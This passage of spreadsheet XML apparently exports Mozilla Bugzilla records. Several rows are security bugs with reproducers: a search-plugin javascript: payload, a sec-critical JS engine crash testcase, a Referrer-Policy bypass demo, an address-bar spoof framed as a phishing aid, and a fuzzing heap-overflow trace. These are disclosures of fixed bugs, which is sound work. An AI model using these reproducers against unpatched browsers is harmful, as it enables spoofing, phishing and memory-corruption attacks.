  &lt;Param name="l" value="dis"/&gt;
&lt;/Url&gt;
&lt;SearchForm&gt;javascript:{aaa=function(){alert('You are owned');document.location="http://www.ask.com";}; aaa();}&lt;/SearchForm&gt;
&lt;/SearchPlugin&gt;
Reproducible: Always</t>
        </is>
      </c>
      <c r="X6287" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6288">
      <c r="A6288" t="n">
        <v>822858</v>
      </c>
      <c r="B6288" t="inlineStr">
        <is>
          <t>2012-12-18 15:15:42 -0800</t>
        </is>
      </c>
      <c r="C6288" t="inlineStr">
        <is>
          <t>Crash [@ js::EncapsulatedPtr] or [@ js::types::TypeObject::print] or "Assertion failure: [infer failure] Missing type in object [0x10172f070] lastIndex: int,"</t>
        </is>
      </c>
      <c r="D6288" t="inlineStr">
        <is>
          <t>2013-11-25 13:20:17 -0800</t>
        </is>
      </c>
      <c r="E6288" t="n">
        <v>1</v>
      </c>
      <c r="F6288" t="n">
        <v>1</v>
      </c>
      <c r="G6288" t="n">
        <v>3</v>
      </c>
      <c r="H6288" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6288" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6288" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6288" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6288" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6288" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6288" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6288" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6288" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main19+][adv-esr1703+]</t>
        </is>
      </c>
      <c r="Q6288" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6288" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6288" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T6288" t="n">
        <v>1</v>
      </c>
      <c r="U6288" t="n">
        <v>0</v>
      </c>
      <c r="V6288" t="n">
        <v>24</v>
      </c>
      <c r="W6288" t="inlineStr">
        <is>
          <t>Created attachment 693646
stack
RegExp.prototype.lastIndex = this
gc()
newGlobal()
eval("RegExp().lastIndex")
crashes js debug shell on m-c changeset fd8fd1a7aecd with -a at js::EncapsulatedPtr
During the process of reduction, the following assert showed up, also with -a, Assertion failure: [infer failure] Missing type in object [0x10172f070] lastIndex: int, with the testcase:
function g() {
    z = newGlobal('')
    return function(code) {
        evalcx(code, z)
    }
}
f = g()
f("this.RegExp.prototype.lastIndex=this")
gc()
f("RegExp().lastIndex")
s-s and sec-critical because it's a type inference failure and involves gc, feel free to change this when shown not to be s-s.
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   108156:7228effb2e5b
user:        Bill McCloskey
date:        Mon Sep 03 16:42:22 2012 -0700
summary:     Bug 787856 - Use lazy protos for cross-compartment wrappers (r=bholley)</t>
        </is>
      </c>
      <c r="X6288" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6289">
      <c r="A6289" t="n">
        <v>1295945</v>
      </c>
      <c r="B6289" t="inlineStr">
        <is>
          <t>2016-08-17 04:58:36 -0700</t>
        </is>
      </c>
      <c r="C6289" t="inlineStr">
        <is>
          <t>HTML documents sent with multipart/x-mixed-replace ignores Referrer-Policy response header</t>
        </is>
      </c>
      <c r="D6289" t="inlineStr">
        <is>
          <t>2024-05-30 09:20:42 -0700</t>
        </is>
      </c>
      <c r="E6289" t="n">
        <v>1</v>
      </c>
      <c r="F6289" t="n">
        <v>1</v>
      </c>
      <c r="G6289" t="n">
        <v>3</v>
      </c>
      <c r="H6289" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6289" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6289" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K6289" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6289" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6289" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6289" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6289" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6289" t="inlineStr">
        <is>
          <t>[domsecurity-active][post-critsmash-triage][adv-main51+]</t>
        </is>
      </c>
      <c r="Q6289" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6289" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6289" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T6289" t="n">
        <v>1</v>
      </c>
      <c r="U6289" t="n">
        <v>0</v>
      </c>
      <c r="V6289" t="n">
        <v>18</v>
      </c>
      <c r="W6289" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
Steps to reproduce:
Following two URLs return a HTML document with "Referrer-Policy no-referrer" in a response header.
#1. MIME: text/html
http://mallory.csrf.jp/x-mixed-replace/referrer/index.html
#2. MIME: multipart/x-mixed-replace
http://mallory.csrf.jp/x-mixed-replace/referrer/bad.php
The hyperlink in #1 sends no REFERER header but the hyperlink in #2 sends REFERER.
Actual results:
This means that a HTML document sent with multipart/x-mixed-replace ignores Referrer-Policy response header. This can be a cause of sensitive information leakage.
Expected results:
Referrer-Policy header should be applied to documents with multipart/x-mixed-replace.</t>
        </is>
      </c>
      <c r="X6289" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6290">
      <c r="A6290" t="n">
        <v>1358611</v>
      </c>
      <c r="B6290" t="inlineStr">
        <is>
          <t>2017-04-21 13:31:03 -0700</t>
        </is>
      </c>
      <c r="C6290" t="inlineStr">
        <is>
          <t>update releasetasks to support devedition betas</t>
        </is>
      </c>
      <c r="D6290" t="inlineStr">
        <is>
          <t>2017-05-17 11:39:39 -0700</t>
        </is>
      </c>
      <c r="E6290" t="n">
        <v>1</v>
      </c>
      <c r="F6290" t="n">
        <v>1</v>
      </c>
      <c r="G6290" t="n">
        <v>5</v>
      </c>
      <c r="H6290" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6290" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6290" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K6290" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6290" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6290" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6290" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6290" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6290" t="inlineStr"/>
      <c r="Q6290" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6290" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6290" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6290" t="n">
        <v>1</v>
      </c>
      <c r="U6290" t="n">
        <v>0</v>
      </c>
      <c r="V6290" t="n">
        <v>12</v>
      </c>
      <c r="W6290" t="inlineStr">
        <is>
          <t>At minimum we need to update https://github.com/mozilla/releasetasks/blob/master/releasetasks/templates/firefox/enUS.yml.tmpl#L157 to use nightly-signing and firefox-mozilla-aurora for the channel id.</t>
        </is>
      </c>
      <c r="X6290" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6291">
      <c r="A6291" t="n">
        <v>1228754</v>
      </c>
      <c r="B6291" t="inlineStr">
        <is>
          <t>2015-11-28 08:52:15 -0800</t>
        </is>
      </c>
      <c r="C6291" t="inlineStr">
        <is>
          <t>Show about:blank (placeholder "Search or enter address" in the URL bar) using javascript URI scheme (spoof)</t>
        </is>
      </c>
      <c r="D6291" t="inlineStr">
        <is>
          <t>2024-09-04 16:05:44 -0700</t>
        </is>
      </c>
      <c r="E6291" t="n">
        <v>1</v>
      </c>
      <c r="F6291" t="n">
        <v>1</v>
      </c>
      <c r="G6291" t="n">
        <v>2</v>
      </c>
      <c r="H6291" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6291" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6291" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K6291" t="inlineStr">
        <is>
          <t>42 Branch</t>
        </is>
      </c>
      <c r="L6291" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6291" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6291" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6291" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6291" t="inlineStr">
        <is>
          <t>[adv-main45+]</t>
        </is>
      </c>
      <c r="Q6291" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6291" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6291" t="inlineStr">
        <is>
          <t>Firefox 47</t>
        </is>
      </c>
      <c r="T6291" t="n">
        <v>1</v>
      </c>
      <c r="U6291" t="n">
        <v>0</v>
      </c>
      <c r="V6291" t="n">
        <v>72</v>
      </c>
      <c r="W6291" t="inlineStr">
        <is>
          <t>Created attachment 8693222
FF-urlhider.html
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Build ID: 20151029151421
Steps to reproduce:
View attached file 'FF-urlhider.html' and simply click the innocent looking anchor tag.
Actual results:
We end up in a completely empty URL address yet we control its documents content.
Expected results:
The problem here is that we are able to hide the URL from the user and make it seem like they visited a trusted website. Since we control the content displayed then this kind of bug could easily be used to perform social engineering/phishing attacks.
If the address bar is set to an absolute empty 'about:blank' (which displays nothing in the address bar except 'search or enter address' then its contents should reflect that and be empty, otherwise its a security risk.</t>
        </is>
      </c>
      <c r="X6291" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6292">
      <c r="A6292" t="n">
        <v>1610568</v>
      </c>
      <c r="B6292" t="inlineStr">
        <is>
          <t>2020-01-21 09:08:56 -0800</t>
        </is>
      </c>
      <c r="C6292" t="inlineStr">
        <is>
          <t>make collector_notes viewable and searchable</t>
        </is>
      </c>
      <c r="D6292" t="inlineStr">
        <is>
          <t>2020-04-02 08:25:40 -0700</t>
        </is>
      </c>
      <c r="E6292" t="n">
        <v>1</v>
      </c>
      <c r="F6292" t="n">
        <v>1</v>
      </c>
      <c r="G6292" t="n">
        <v>4</v>
      </c>
      <c r="H6292" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6292" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J6292" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6292" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6292" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6292" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6292" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6292" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6292" t="inlineStr"/>
      <c r="Q6292" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6292" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6292" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6292" t="n">
        <v>1</v>
      </c>
      <c r="U6292" t="n">
        <v>0</v>
      </c>
      <c r="V6292" t="n">
        <v>6</v>
      </c>
      <c r="W6292" t="inlineStr">
        <is>
          <t>Bug #1610540 added a `collector_notes` field to the raw crash. The collector adds notes to this field so we have some information about how the crash report was collected.
This bug covers making this field searchable and viewable in Crash Stats. We can probably follow what we do with `processor_notes`.</t>
        </is>
      </c>
      <c r="X6292" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6293">
      <c r="A6293" t="n">
        <v>1410940</v>
      </c>
      <c r="B6293" t="inlineStr">
        <is>
          <t>2017-10-23 09:14:54 -0700</t>
        </is>
      </c>
      <c r="C6293" t="inlineStr">
        <is>
          <t>Copy &amp; Pasting multiple items into the Library window gets the insertion indexes wrong</t>
        </is>
      </c>
      <c r="D6293" t="inlineStr">
        <is>
          <t>2017-11-09 06:06:53 -0800</t>
        </is>
      </c>
      <c r="E6293" t="n">
        <v>1</v>
      </c>
      <c r="F6293" t="n">
        <v>1</v>
      </c>
      <c r="G6293" t="n">
        <v>2</v>
      </c>
      <c r="H6293" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6293" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6293" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K6293" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6293" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6293" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6293" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6293" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6293" t="inlineStr">
        <is>
          <t>[fxsearch]</t>
        </is>
      </c>
      <c r="Q6293" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6293" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6293" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T6293" t="n">
        <v>1</v>
      </c>
      <c r="U6293" t="n">
        <v>0</v>
      </c>
      <c r="V6293" t="n">
        <v>19</v>
      </c>
      <c r="W6293" t="inlineStr">
        <is>
          <t>This is very similar to bug 1391166.
STR
1) Have 20 or so bookmarks in a folder.
2) Select several bookmarks individually spread out across the list
3) Right-click and select Copy
4) Somewhere around the middle of the bookmark list (so there's some above &amp; below), right-click and select Paste
Expected Results
=&gt; The bookmarks are inserted at the paste point next to each other.
Actual Results
=&gt; The bookmarks are inserted near the paste point but are not next to each other.
This is happening due to the paste handling code being different to the drop handling code.
I'm working on harmonising those as it'll also make it easier to work on some performance improvements (bug 1404909). Hence setting as P1 as I need this first.</t>
        </is>
      </c>
      <c r="X6293" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6294">
      <c r="A6294" t="n">
        <v>870200</v>
      </c>
      <c r="B6294" t="inlineStr">
        <is>
          <t>2013-05-08 19:47:42 -0700</t>
        </is>
      </c>
      <c r="C6294" t="inlineStr">
        <is>
          <t>Assertion failure: (ptrBits &amp; 0x7) == 0, at ./dist/include/js/Value.h:703 or Crash [@ GetValueType]</t>
        </is>
      </c>
      <c r="D6294" t="inlineStr">
        <is>
          <t>2014-11-19 20:02:55 -0800</t>
        </is>
      </c>
      <c r="E6294" t="n">
        <v>1</v>
      </c>
      <c r="F6294" t="n">
        <v>1</v>
      </c>
      <c r="G6294" t="n">
        <v>3</v>
      </c>
      <c r="H6294" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6294" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6294" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6294" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6294" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6294" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6294" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6294" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6294" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main23+]</t>
        </is>
      </c>
      <c r="Q6294" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6294" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6294" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T6294" t="n">
        <v>1</v>
      </c>
      <c r="U6294" t="n">
        <v>0</v>
      </c>
      <c r="V6294" t="n">
        <v>22</v>
      </c>
      <c r="W6294" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision e19d0885977c (run with --ion-eager):
function getter(a, i) {
  return a[i];
}
function foo(... a) {
  res = 0;
  for (var j = 0; j &lt; 100 ; j++) {
    res += getter(a, j);
  }
}
var n = 100;
var a = Array(n);
var q = foo(a, n);</t>
        </is>
      </c>
      <c r="X6294" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6295">
      <c r="A6295" t="n">
        <v>1243513</v>
      </c>
      <c r="B6295" t="inlineStr">
        <is>
          <t>2016-01-27 12:53:07 -0800</t>
        </is>
      </c>
      <c r="C6295" t="inlineStr">
        <is>
          <t>graphite2: heap-buffer-overflow read in CachedCmap.cpp</t>
        </is>
      </c>
      <c r="D6295" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:34 -0700</t>
        </is>
      </c>
      <c r="E6295" t="n">
        <v>1</v>
      </c>
      <c r="F6295" t="n">
        <v>1</v>
      </c>
      <c r="G6295" t="n">
        <v>3</v>
      </c>
      <c r="H6295" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6295" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6295" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K6295" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6295" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6295" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6295" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6295" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6295" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q6295" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6295" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6295" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6295" t="n">
        <v>1</v>
      </c>
      <c r="U6295" t="n">
        <v>0</v>
      </c>
      <c r="V6295" t="n">
        <v>8</v>
      </c>
      <c r="W6295" t="inlineStr">
        <is>
          <t>Created attachment 8712829
test_case.ttf
This was found while fuzzing graphite2 1.3.5 (and is in 1.3.4)
==62151==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62d00001b400 at pc 0x7f19df55deb5 bp 0x7ffde144d6f0 sp 0x7ffde144d6e8
READ of size 8 at 0x62d00001b400 thread T0
    #0 0x7f19df55deb4 in bool cache_subtable&lt;&amp;graphite2::TtfUtil::CmapSubtable12NextCodepoint, &amp;graphite2::TtfUtil::CmapSubtable12Lookup&gt;(unsigned short**, void const*, unsigned int) /home/user/code/graphite/src/CmapCache.cpp:70:14
    #1 0x7f19df55deb4 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&amp;) /home/user/code/graphite/src/CmapCache.cpp:101
    #2 0x7f19df587f65 in graphite2::Face::readGlyphs(unsigned int) /home/user/code/graphite/src/Face.cpp:108:22
    #3 0x7f19df553667 in (anonymous namespace)::load_face(graphite2::Face&amp;, unsigned int) /home/user/code/graphite/src/gr_face.cpp:54:14
    #4 0x7f19df554cf9 in gr_make_face_with_ops /home/user/code/graphite/src/gr_face.cpp:89:16
    #5 0x7f19df554cf9 in gr_make_file_face /home/user/code/graphite/src/gr_face.cpp:242
    #6 0x4e6c09 in Parameters::testFileFont() const /home/user/code/graphite/gr2fonttest/gr2FontTest.cpp:629:20
    #7 0x4e87bc in main /home/user/code/graphite/gr2fonttest/gr2FontTest.cpp:781:12
    #8 0x7f19df19dec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
    #9 0x41a545 in _start (/home/user/Desktop/graphite/gr2fonttest+0x41a545)</t>
        </is>
      </c>
      <c r="X6295" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6296">
      <c r="A6296" t="n">
        <v>1123433</v>
      </c>
      <c r="B6296" t="inlineStr">
        <is>
          <t>2015-01-19 11:52:00 -0800</t>
        </is>
      </c>
      <c r="C6296" t="inlineStr">
        <is>
          <t>COPPA error screen in FxAccounts signup allows loading arbitrary web content into B2G root process</t>
        </is>
      </c>
      <c r="D6296" t="inlineStr">
        <is>
          <t>2016-07-02 10:10:51 -0700</t>
        </is>
      </c>
      <c r="E6296" t="n">
        <v>1</v>
      </c>
      <c r="F6296" t="n">
        <v>1</v>
      </c>
      <c r="G6296" t="n">
        <v>6</v>
      </c>
      <c r="H6296" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6296" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J6296" t="inlineStr">
        <is>
          <t>Gaia::System</t>
        </is>
      </c>
      <c r="K6296" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6296" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6296" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N6296" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6296" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6296" t="inlineStr">
        <is>
          <t>[systemsfe][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q6296" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6296" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6296" t="inlineStr">
        <is>
          <t>2.2 S7 (6mar)</t>
        </is>
      </c>
      <c r="T6296" t="n">
        <v>1</v>
      </c>
      <c r="U6296" t="n">
        <v>0</v>
      </c>
      <c r="V6296" t="n">
        <v>33</v>
      </c>
      <c r="W6296" t="inlineStr">
        <is>
          <t>In following the STR for bug 1109531 on master, I noticed that an external website (hosted at ftc.gov) gets loaded into the b2g root process. This seems bad, as we don't control this content and a user clicking on links from that page can theoretically load arbitrary content into the b2g root process.
STR (basically copied from bug 1109531):
1. go to settings &gt; Firefox accounts
2. click on "create account or sign in"
3. enter a bogus email address that has no firefox account associated with it (e.g. foo@bar.asdlkfjlaskfdj) and hit next
4. In the age verification drop-down pick a recent year (e.g. 2014) and hit next
5. On the COPPA error message screen that shows up click on "learn more"</t>
        </is>
      </c>
      <c r="X6296" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6297">
      <c r="A6297" t="n">
        <v>756093</v>
      </c>
      <c r="B6297" t="inlineStr">
        <is>
          <t>2012-05-17 08:00:14 -0700</t>
        </is>
      </c>
      <c r="C6297" t="inlineStr">
        <is>
          <t>Update Want to help? form to support additional languages</t>
        </is>
      </c>
      <c r="D6297" t="inlineStr">
        <is>
          <t>2012-09-24 09:56:52 -0700</t>
        </is>
      </c>
      <c r="E6297" t="n">
        <v>1</v>
      </c>
      <c r="F6297" t="n">
        <v>1</v>
      </c>
      <c r="G6297" t="n">
        <v>5</v>
      </c>
      <c r="H6297" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6297" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J6297" t="inlineStr">
        <is>
          <t>L10N</t>
        </is>
      </c>
      <c r="K6297" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6297" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6297" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6297" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6297" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6297" t="inlineStr">
        <is>
          <t>[sb-sprint-3] u=user c=L10N p=2</t>
        </is>
      </c>
      <c r="Q6297" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6297" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6297" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6297" t="n">
        <v>1</v>
      </c>
      <c r="U6297" t="n">
        <v>0</v>
      </c>
      <c r="V6297" t="n">
        <v>19</v>
      </c>
      <c r="W6297" t="inlineStr">
        <is>
          <t>In order to localize the Get Involved page we'll also need to update the 'Want to help?' form to handle additional languages.  
Modifying the existing form might not be the best way to scale this to handle dozens of locales, but in the short-term it will work for adding one or two locales.  See bug 743746 for plans for adding the first two non-English locales for this page.
The relevant files in github are:
The location of the current auto-responses in use
https://github.com/mozilla/bedrock/tree/master/apps/mozorg/templates/emails
The location of the form elements
https://github.com/mozilla/bedrock/blob/master/apps/mozorg/forms.py
The location of the form logic
https://github.com/mozilla/bedrock/blob/master/apps/mozorg/views.py
James Long and Steven Garrity ported this form to Bedrock, so we can also ask them any questions we have about how to update things to support additional languages.</t>
        </is>
      </c>
      <c r="X6297" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6298">
      <c r="A6298" t="n">
        <v>1606619</v>
      </c>
      <c r="B6298" t="inlineStr">
        <is>
          <t>2020-01-02 04:39:46 -0800</t>
        </is>
      </c>
      <c r="C6298" t="inlineStr">
        <is>
          <t>key3.db encryption key remains on disk from Thunderbird 52.x (becomes issue if adding a master password post 60.x)</t>
        </is>
      </c>
      <c r="D6298" t="inlineStr">
        <is>
          <t>2020-02-12 02:57:44 -0800</t>
        </is>
      </c>
      <c r="E6298" t="n">
        <v>1</v>
      </c>
      <c r="F6298" t="n">
        <v>1</v>
      </c>
      <c r="G6298" t="n">
        <v>2</v>
      </c>
      <c r="H6298" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6298" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J6298" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K6298" t="inlineStr">
        <is>
          <t>60</t>
        </is>
      </c>
      <c r="L6298" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6298" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6298" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6298" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6298" t="inlineStr"/>
      <c r="Q6298" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6298" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6298" t="inlineStr">
        <is>
          <t>Thunderbird 74.0</t>
        </is>
      </c>
      <c r="T6298" t="n">
        <v>1</v>
      </c>
      <c r="U6298" t="n">
        <v>0</v>
      </c>
      <c r="V6298" t="n">
        <v>32</v>
      </c>
      <c r="W6298" t="inlineStr">
        <is>
          <t>We haven't yet fixed bug 1475775 in Thunderbird.
Because of the risk of key dataloss (e.g. bug 1510212), we're waiting for a solution that is more reliable than what Firefox had used as a fix.
Let's use this new bug to track fixing the issue in Thunderbird.
In separate NSS bug 1561368 we're working out an appropriate solution, potentially at the NSS code level.</t>
        </is>
      </c>
      <c r="X6298" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6299">
      <c r="A6299" t="n">
        <v>786833</v>
      </c>
      <c r="B6299" t="inlineStr">
        <is>
          <t>2012-08-29 14:33:44 -0700</t>
        </is>
      </c>
      <c r="C6299" t="inlineStr">
        <is>
          <t>Details page doesn't load on navigating from search results page</t>
        </is>
      </c>
      <c r="D6299" t="inlineStr">
        <is>
          <t>2012-09-05 05:44:18 -0700</t>
        </is>
      </c>
      <c r="E6299" t="n">
        <v>1</v>
      </c>
      <c r="F6299" t="n">
        <v>1</v>
      </c>
      <c r="G6299" t="n">
        <v>6</v>
      </c>
      <c r="H6299" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6299" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J6299" t="inlineStr">
        <is>
          <t>Consumer Pages</t>
        </is>
      </c>
      <c r="K6299" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L6299" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6299" t="inlineStr">
        <is>
          <t>All</t>
        </is>
